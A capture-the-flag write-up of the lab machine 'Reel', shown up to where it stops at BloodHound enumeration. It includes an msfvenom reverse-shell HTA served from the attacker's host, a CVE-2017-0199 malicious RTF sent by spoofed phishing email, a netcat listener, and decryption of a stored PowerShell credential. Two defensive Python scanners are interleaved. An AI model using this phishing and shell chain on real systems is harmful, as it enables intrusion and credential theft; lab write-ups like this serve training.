Enumeration
Nmap Scanning
Command
└─$ nmap -sC -sV -oN nmap-scan -Pn 10.10.10.77
Result
# Nmap 7.93 scan initiated Sat Dec 24 10:06:19 2022 as: nmap -sC -sV -oN nmap-scan -Pn 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.19s latency).
Scanned at 2022-12-24 10:06:20 EAT for 225s
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 8220c3bd16cba29c88871d6c1559eded (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQkehAZGj87mZluxFiVu+GPAAnC/OQ9QKUF2wlIwvefrD2L4zWyGXlAgSbUq/MqujR/efrTIjPYWK+5Mlxc7gEoZBylGAPbdxFivL8YQs3dQPt6aHNF0v+ABS01L2qZ4ewd1sTi1TlT6LtWHehX2PBJ6S3LWG09v+E/3ue97y9gaOjfA6BCMWgQ7K3yvQeHrRpBSk/vQxfCh4TINwV3EGbGTfbs8VvvR+Et7weB5EOifgXfHbyh04KemONkceFSAnjRRYOgwvtXai9imsDJ8KtS2RMR197VK4MBhsY7+h0nOvUMgm76RcRc6N8GW1mn6gWp98Ds9VeymzAmQvprs97
| 256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAw2CYanDlTRpGqzVXrfGTcAYVe/vUnnkWicQPzdfix5gFsv4nOGNUM+Fko7QAW0jqCFQKc8anGAwJjFGLTB00k=
| 256 ac8bde251db7d838389b9c16bff63fed (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICdDfn+n5xueGtHP20/aPkI8pvCfxb2UZA3RQdqnpjBk
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
...[snip]...
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 24 10:10:05 2022 -- 1 IP address (1 host up) scanned in 226.01 seconds
Nmap shows that only three ports are open: FTP (21), SSH (22) and SMTP (25).
Anonymous login
Nmap showed that anonymous login is allowed on the FTP service, so I connected to the machine with it.
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/reel]
└─$ ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:gemstone): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
After logging in as the anonymous user, I listed the directories to see whether there was anything interesting and found a documents directory.
ftp> dir
229 Entering Extended Passive Mode (|||41000|)
125 Data connection already open; Transfer starting.
05-28-18 11:19PM <DIR> documents
226 Transfer complete.
ftp>
I changed into this directory, saw a few files and copied them to my machine.
ftp> cd documents
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||41002|)
125 Data connection already open; Transfer starting.
05-28-18 11:19PM 2047 AppLocker.docx
05-28-18 01:01PM 124 readme.txt
10-31-17 09:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp> prompt
Interactive mode off.
ftp> mget *
Each of the files contains a small but valuable detail, starting with AppLocker.docx, which gives a hint about the host's application control:
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
readme.txt tells us that we have to send an email, and it already specifies the format to be sent:
please email me any rtf format procedures - I’ll review and convert.
new format / converted documents will be saved here.
Windows Event Forwarding.docx: I was unable to open this file, but I checked its metadata with exiftool and it turned up some interesting information.
└─$ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.52
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 15 kB
File Modification Date/Time : 2017:11:01 00:13:23+03:00
File Access Date/Time : 2023:01:05 01:20:48+03:00
File Inode Change Date/Time : 2023:01:05 01:20:41+03:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000
The Creator field of this file's metadata contains the email address nico@megabank.com, which will be the recipient of the email.
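A pre-publication check for exactly this kind of leak, as an added example that is not part of the original writeup: the script reads the docProps/core.xml part inside a .docx and reports the identity-bearing core properties (the same fields exiftool printed above). The sample document it builds is constructed inline; only the creator value nico@megabank.com is taken from the exiftool output.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by docProps/core.xml inside an Office Open XML document.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
# Core properties that commonly carry a person's name or email address.
IDENTITY_FIELDS = (("dc:creator", "Creator"), ("cp:lastModifiedBy", "Last Modified By"))

def docx_identity_metadata(data: bytes) -> dict:
    """Return the identity-bearing core properties of a .docx held in memory."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if "docProps/core.xml" not in zf.namelist():
            return found  # no core-properties part, nothing to leak from it
        root = ET.fromstring(zf.read("docProps/core.xml"))
        for tag, label in IDENTITY_FIELDS:
            el = root.find(tag, NS)
            if el is not None and el.text and el.text.strip():
                found[label] = el.text.strip()
    return found

def leaked_emails(data: bytes) -> list:
    """Metadata values that look like email addresses, i.e. what exiftool exposed."""
    return sorted({v for v in docx_identity_metadata(data).values() if "@" in v})

def build_sample_docx(creator: str, last_modified_by: str) -> bytes:
    """Constructed sample: a minimal zip holding only the parts this check reads."""
    core = (
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:creator>%s</dc:creator><cp:lastModifiedBy>%s</cp:lastModifiedBy>"
        "</cp:coreProperties>"
    ) % (NS["cp"], NS["dc"], creator, last_modified_by)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/core.xml", core)
    return buf.getvalue()

if __name__ == "__main__":
    # Creator value taken from the exiftool output above; the second value is made up.
    sample = build_sample_docx("nico@megabank.com", "Nico")
    print(docx_identity_metadata(sample))
    print("emails exposed in metadata:", leaked_emails(sample))
```

Run the same function over real files before they are dropped on a share such as the anonymous FTP documents directory; a non-empty result from leaked_emails is a finding.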
Phishing Email
This box was released while CVE-2017-0199 was current. To exploit it, I will get the user to open a malicious RTF file, which makes an HTTP request for an HTA file. I want that HTA file to execute code that gives me a shell. I will use msfvenom (from the Metasploit framework) to create the HTA.
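The document-side indicators of that technique are what a mail gateway or file scanner should key on: an OLE object marked to update its link automatically plus a URL inside the object data. The scanner below is an added example, not part of the original writeup or of the toolkit used later; its test input is a constructed fragment carrying only those markers (no usable object stream), and the hostname in it is a placeholder.

```python
import re

# Control words a CVE-2017-0199 style RTF relies on: an OLE object whose
# linked content is refreshed automatically when the document is opened.
SUSPICIOUS_CONTROL_WORDS = (b"\\objautlink", b"\\objupdate")

# Hex payload that follows \objdata (whitespace and line breaks allowed).
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")
ASCII_URL_RE = re.compile(rb"https?://[\x21-\x7e]+")
# The same pattern for a UTF-16LE string, which is how a URL moniker stores it.
WIDE_URL_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")

def decode_objdata(rtf: bytes) -> list:
    """Decode every \\objdata hex blob in the document into raw bytes."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]  # tolerate a dangling nibble from truncation
        blobs.append(bytes.fromhex(hexstr.decode("ascii")))
    return blobs

def find_urls(blob: bytes) -> list:
    """Return http(s) URLs found in the blob, in ASCII or UTF-16LE form."""
    urls = [m.group(0).decode("ascii") for m in ASCII_URL_RE.finditer(blob)]
    urls += [m.group(0).decode("utf-16-le") for m in WIDE_URL_RE.finditer(blob)]
    return urls

def scan_rtf(rtf: bytes) -> dict:
    """Flag an RTF that auto-updates an OLE link whose object data carries a URL."""
    words = [w.decode() for w in SUSPICIOUS_CONTROL_WORDS if w in rtf]
    urls = [u for blob in decode_objdata(rtf) for u in find_urls(blob)]
    # Both conditions are required: a plain embedded object with no remote
    # link, or a link that is not auto-updated, is not flagged by this rule.
    return {"control_words": words, "urls": urls,
            "suspicious": bool(words) and bool(urls)}

def build_sample(url: str) -> bytes:
    """Constructed test input: carries only the markers, not a usable object stream."""
    payload = url.encode("utf-16-le").hex().encode("ascii")
    return b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objdata " + payload + b"}}}"

if __name__ == "__main__":
    # EXAMPLE-HOST is a placeholder; msfv.hta is the HTA name used in this writeup.
    print(scan_rtf(build_sample("http://EXAMPLE-HOST/msfv.hta")))
    print(scan_rtf(b"{\\rtf1{\\object\\objemb{\\*\\objdata 0102}}}"))
```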
Meterpreter
Command
┌──(gemstone㉿hashghost)-[~/…/Machines/vip/reel/exploit]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f hta-psh -o msfv.hta
Result
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of hta-psh file: 7295 bytes
Saved as: msfv.hta
The next step is to create the RTF file that will be sent to nico@megabank.com. To generate the phishing document I used the CVE-2017-0199 toolkit from GitHub.
┌──(gemstone㉿hashghost)-[~/…/Machines/vip/reel/exploit]
└─$ python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.5/msfv.hta -t rtf -x 0
Generating normal RTF payload.
Generated invoice.rtf successfully
Sending email.
To send the document to user nico@megabank.com, the HTA file has to be hosted somewhere; in my case I hosted it with python3 -m http.server 80. I then sent the email manually with sendEmail, attaching the malicious RTF file. Here are the steps:
- Host the HTA file that user nico's document will fetch
┌──(gemstone㉿hashghost)-[~/…/Machines/vip/reel/exploit]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
- Start a listener with netcat
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/reel]
└─$ nc -nlvp 1234
- Send the email with sendEmail
Command
┌──(gemstone㉿hashghost)-[~/…/Machines/vip/reel/exploit]
└─$ sendEmail -f hashghost@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s 10.10.10.77 -v
General results
After the email with the attachment is sent, the effect should be visible in every one of the three terminals.
- After sending the email you should see output similar to the following:
Jan 05 02:20:33 hashghost sendEmail[20396]: DEBUG => Connecting to 10.10.10.77:25
Jan 05 02:20:34 hashghost sendEmail[20396]: DEBUG => My IP address is: 10.10.14.5
Jan 05 02:20:34 hashghost sendEmail[20396]: SUCCESS => Received: 220 Mail Service ready
Jan 05 02:20:34 hashghost sendEmail[20396]: INFO => Sending: EHLO hashghost
Jan 05 02:20:34 hashghost sendEmail[20396]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Jan 05 02:20:34 hashghost sendEmail[20396]: INFO => Sending: MAIL FROM:<hashghost@megabank.com>
Jan 05 02:20:35 hashghost sendEmail[20396]: SUCCESS => Received: 250 OK
Jan 05 02:20:35 hashghost sendEmail[20396]: INFO => Sending: RCPT TO:<nico@megabank.com>
Jan 05 02:20:35 hashghost sendEmail[20396]: SUCCESS => Received: 250 OK
Jan 05 02:20:35 hashghost sendEmail[20396]: INFO => Sending: DATA
Jan 05 02:20:35 hashghost sendEmail[20396]: SUCCESS => Received: 354 OK, send.
Jan 05 02:20:35 hashghost sendEmail[20396]: INFO => Sending message body
Jan 05 02:20:35 hashghost sendEmail[20396]: Setting content-type: text/plain
Jan 05 02:20:35 hashghost sendEmail[20396]: DEBUG => Sending the attachment [invoice.rtf]
Jan 05 02:20:47 hashghost sendEmail[20396]: SUCCESS => Received: 250 Queued (11.937 seconds)
Jan 05 02:20:47 hashghost sendEmail[20396]: Email was sent successfully! From: <hashghost@megabank.com> To: <nico@megabank.com> Subject: [Invoice Attached] Attachment(s): [invoice.rtf] Server: [10.10.10.77:25]
- The Python web server should log a request for the HTA file with a 200 response.
┌──(gemstone㉿hashghost)-[~/…/Machines/vip/reel/exploit]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.77 - - [05/Jan/2023 02:20:58] "GET /msfv.hta HTTP/1.1" 200 -
- The listener should have received a shell.
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.77] 59061
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
User Account
C:\Windows\system32>whoami
htb\nico
User flag
C:\Users\nico\Desktop>type user.txt
322434b5216bf9d******
Privilege Escalation
In the Desktop directory of user nico there is another file, named cred.xml.
C:\Users\nico\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CEBA-B613
Directory of C:\Users\nico\Desktop
28/05/2018 20:07 <DIR> .
28/05/2018 20:07 <DIR> ..
27/10/2017 23:59 1,468 cred.xml
04/01/2023 22:08 34 user.txt
2 File(s) 1,502 bytes
2 Dir(s) 4,956,569,600 bytes free
This file contains the following:
C:\Users\nico\Desktop>type cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>
This password seems to belong to user tom, because the file pairs "UserName">HTB\Tom with a "Password" entry. The password is a SecureString that Export-Clixml protected with DPAPI under nico's account, so it can be decrypted from nico's shell on this host with the following command, which can be found on Stack Overflow:
C:\Users\nico\Desktop>powershell -c "$credential = Import-CliXml -Path cred.xml; $credential.GetNetworkCredential().Password"
1ts-mag1c!!!
But this password can only be used to log in as user tom over SSH, so let's do that.
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/reel]
└─$ ssh tom@10.10.10.77
tom@10.10.10.77's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
tom@REEL C:\Users\tom>whoami
htb\tom
BloodHound data
After logging in as user tom, his Desktop directory contains a directory named AD Audit, which holds a note.txt, a BloodHound directory and the powerview.ps1 script. The file note.txt has some hints:
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we’ve created.
In the BloodHound directory:
PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> dir
Directory: C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 11/16/2017 11:50 PM 112225 acls.csv
-a--- 10/28/2017 9:50 PM 3549 BloodHound.bin
-a--- 10/24/2017 4:27 PM 246489 BloodHound_Old.ps1
-a--- 10/24/2017 4:27 PM 568832 SharpHound.exe
-a--- 10/24/2017 4:27 PM 636959 SharpHound.ps1
Almost all of these tools are blocked, so I can either use the nico account and collect the data with BloodHound myself, or use the acls.csv file, which has details of the domain's users.
That is all for today; I will continue once I have finished the rest.